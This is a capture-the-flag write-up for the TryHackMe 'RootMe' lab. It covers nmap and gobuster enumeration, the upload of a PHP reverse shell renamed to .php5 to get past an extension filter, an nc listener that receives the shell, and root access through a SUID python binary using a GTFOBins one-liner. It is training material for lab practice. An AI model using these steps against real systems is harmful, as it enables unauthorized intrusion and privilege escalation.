Writeups
  • Writeups
    • TryHackMe
      • 🕵️‍♀️Basic Pentesting
      • 🔷Blue
      • ⚡Bolt
      • 🤖Cyborg
      • 🃏HA Jocker CTF
      • 🧊Ice
      • 🕯️Ignite
      • 🎃Jack-of-All-Trades
      • 🎩Mr Robot
      • 🔓Overpass
      • 🥒Pickle Rick
      • 💻RootMe
      • 🐇Year of the Rabbit
    • Vulnhub
      • 📦Colddbox
      • 💱Crypto Bank
      • 🛰️GoldenEye
      • 🎊Hacker Fest
      • 🤠Lampiao
      • ✴️Node
      • ♟️PWNLAB
      • 🔓Solid State
      • 📎Stapler
    • CTFs
      • 🤐Zippy
    • Demos
      • 🤒AMSI bypass using Python
      • 🌆Steganography tools
Powered by GitBook
On this page
  • 1. Reconnaissance
  • 1.1 Nmap
  • 2. Scanning
  • 2.1 Gobuster
  • 3. Gaining Access
  • 3.1 Reverse shell
  • 4. Privilege Escalation
  • 4.1 SUID
  1. Writeups
  2. TryHackMe

RootMe

PreviousPickle RickNextYear of the Rabbit

Last updated 2 years ago

A ctf for beginners, can you root me?

1. Reconnaissance

1.1 Nmap

Using nmap to scan for open ports and services

nmap -Pn -sC -sV -oA nmap.initial 10.10.40.110                        

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 19:14 IST
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.40.110
Host is up (2.8s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.54 seconds

  • we find 2 open ports, 22 and 80 running ssh and web server respectively

2. Scanning

2.1 Gobuster

Using gobuster to brute-force directories in the web server.

sudo gobuster dir -u http://10.10.40.110 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.110
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/28 19:15:27 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 309] [--> http://10.10.40.110/js/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.40.110/css/]
/uploads              (Status: 301) [Size: 314] [--> http://10.10.40.110/uploads/]
/panel                (Status: 301) [Size: 312] [--> http://10.10.40.110/panel/]  
/server-status        (Status: 403) [Size: 277]

  • We find two interesting directories /panel and /uploads

/panel

  • We find a page to upload files

/uploads

  • We can see and access the uploaded files here

3. Gaining Access

3.1 Reverse shell

Using the php reverse shell from pentest monkey (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)

  • We find that uploading any .php files gives us an error

  • Changing the extension of the script from .php to .php5 to bypass

  • Starting an nc listener on our attacking machine and executing the reverse shell by going to /uploads selecting our uploaded .php5 file

nc -lvnp 9001 

1m 34s
listening on [any] 9001 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.150.128] 45406

  • Stabilizing the shell and reading user.txt file

$ python -c 'import pty;pty.spawn("/bin/bash")'

bash-4.4$ find / -type f -name user.txt 2>/dev/null
/var/www/user.txt

bash-4.4$ cat /var/www/user.txt

4. Privilege Escalation

4.1 SUID

  • Searching for exploitable processes with set SUID

bash-4.4$ find / -type f -perm -04000 -ls 2>/dev/null

=====================================================================
2019 /usr/bin/newuidmap
   787288     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newgidmap
   787086     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /usr/bin/chsh
   266770   3580 -rwsr-sr-x   1 root     root        3665768 Aug  4  2020 /usr/bin/python
   787033     52 -rwsr-sr-x   1 daemon   daemon        51464 Feb 20  2018 /usr/bin/at
   787084     76 -rwsr-xr-x   1 root     root          76496 Mar 22  2019 /usr/bin/chfn
   787179     76 -rwsr-xr-x   1 root     root          75824 Mar 22  2019 /usr/bin/gpasswd
   787431    148 -rwsr-xr-x   1 root     root         149080 Jan 31  2020 /usr/bin/sudo
   787289     40 -rwsr-xr-x   1 root     root          40344 Mar 22  
   
=======================================================================

  • We find that /usr/bin/python has SUID bit set.

  • Using the one liner from GTFOBins, we get root

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

whoami
root

  • Reading root.txt

cd /root
cat root.txt
💻